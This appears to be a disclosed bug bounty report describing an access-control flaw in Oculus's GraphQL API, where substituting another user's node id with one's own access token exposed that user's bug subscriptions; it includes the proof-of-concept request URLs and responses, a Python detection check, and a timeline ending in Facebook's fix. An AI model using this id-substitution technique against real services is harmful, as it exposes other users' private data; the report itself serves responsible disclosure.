View the bug subscriptions for any Oculus User

Within https://developer.oculus.com/bugs/, there is the ability to subscribe to Oculus bugs created by users. However, it is possible to query the subscribed bugs for any user.
User: phwd
ID: 1
OC Access Token: TOKEN_ONE
Malicious User: phwdtest
ID: 2
OC Access Token: TOKEN_TWO
https://graph.oculus.com/graphql?q=me%28%29%7Bsubscribed_external_tasks%7Bnodes%7Bid%2Ctitle%7D%7D%7D&access_token=TOKEN_ONE
Bug subscriptions for phwd

{
    "1": {
        "subscribed_external_tasks": {
            "nodes": [{
                "id": "33",
                "title": "HARDWARE ERROR"
            }]
        }
    }
}


Check bug subscriptions for phwdtest
https://graph.oculus.com/graphql?q=me%28%29%7Bsubscribed_external_tasks%7Bnodes%7Bid%2Ctitle%7D%7D%7D&access_token=TOKEN_TWO

{
    "2": {
        "subscribed_external_tasks": {
            "nodes": []
        }
    }
}


Check bug subscriptions for phwd as phwdtest
https://graph.oculus.com/graphql?q=node%281%29%7Bsubscribed_external_tasks%7Bnodes%7Bid%2Ctitle%7D%7D%7D&access_token=TOKEN_TWO

{
    "1": {
        "subscribed_external_tasks": {
            "nodes": [{
                "id": "33",
                "title": "HARDWARE ERROR"
            }]
        }
    }
}
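As an added example (not part of the original report), the server-side ownership check that the endpoint was missing, applied to the three request URLs above. It decodes the q parameter, reads the root field (me() or node(<id>)), and flags any request whose node id differs from the user the access token belongs to; the token-to-user mapping is a constructed assumption standing in for whatever the real token lookup returns.

```python
from urllib.parse import urlsplit, parse_qs
import re

# Constructed mapping from access token to the user id it was issued to
# (assumption; in practice this comes from token validation/introspection).
TOKEN_OWNER = {"TOKEN_ONE": "1", "TOKEN_TWO": "2"}

# Matches the root field of the query string: me() or node(<id>)
ROOT_FIELD = re.compile(r"^\s*(me|node)\s*\(\s*(\d*)\s*\)")

def requested_subject(query: str, token: str):
    """Return the user id the query is about: the token owner for me(),
    or the explicit id for node(<id>). None if the shape is unrecognised."""
    m = ROOT_FIELD.match(query)
    if not m:
        return None
    field, arg = m.groups()
    if field == "me":
        return TOKEN_OWNER.get(token)
    return arg or None

def is_cross_user_access(url: str):
    """True when a node(<id>) query names a user other than the token owner.
    Usable as the authorization check before resolving the query, or as a
    rule over request logs to detect the same access pattern."""
    params = parse_qs(urlsplit(url).query)
    token = params.get("access_token", [""])[0]
    query = params.get("q", [""])[0]   # parse_qs already percent-decodes
    subject = requested_subject(query, token)
    owner = TOKEN_OWNER.get(token)
    if subject is None or owner is None:
        return None   # cannot decide; send to manual review
    return subject != owner

# Constructed request lines mirroring the three requests in the write-up.
SAMPLE_REQUESTS = [
    "https://graph.oculus.com/graphql?q=me%28%29%7Bsubscribed_external_tasks%7Bnodes%7Bid%2Ctitle%7D%7D%7D&access_token=TOKEN_ONE",
    "https://graph.oculus.com/graphql?q=me%28%29%7Bsubscribed_external_tasks%7Bnodes%7Bid%2Ctitle%7D%7D%7D&access_token=TOKEN_TWO",
    "https://graph.oculus.com/graphql?q=node%281%29%7Bsubscribed_external_tasks%7Bnodes%7Bid%2Ctitle%7D%7D%7D&access_token=TOKEN_TWO",
]

def flag_requests(urls=SAMPLE_REQUESTS):
    """Return the requests that read another user's subscriptions."""
    return [u for u in urls if is_cross_user_access(u)]

if __name__ == "__main__":
    for u in flag_requests():
        print("cross-user access:", u)
```

Only the third request (node(1) with TOKEN_TWO) is flagged; the two me() requests resolve to their own token owner and pass.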


Impact
This could have let an attacker view the bugs an Oculus user has subscribed to, which are not intended to be public.
Timeline

  • Jan 15, 2018 – Report Sent
  • Jan 16, 2018 – Further investigation by Facebook
  • Jan 29, 2018 – Fixed by Facebook
  • Jan 31, 2018 – Bounty Awarded by Facebook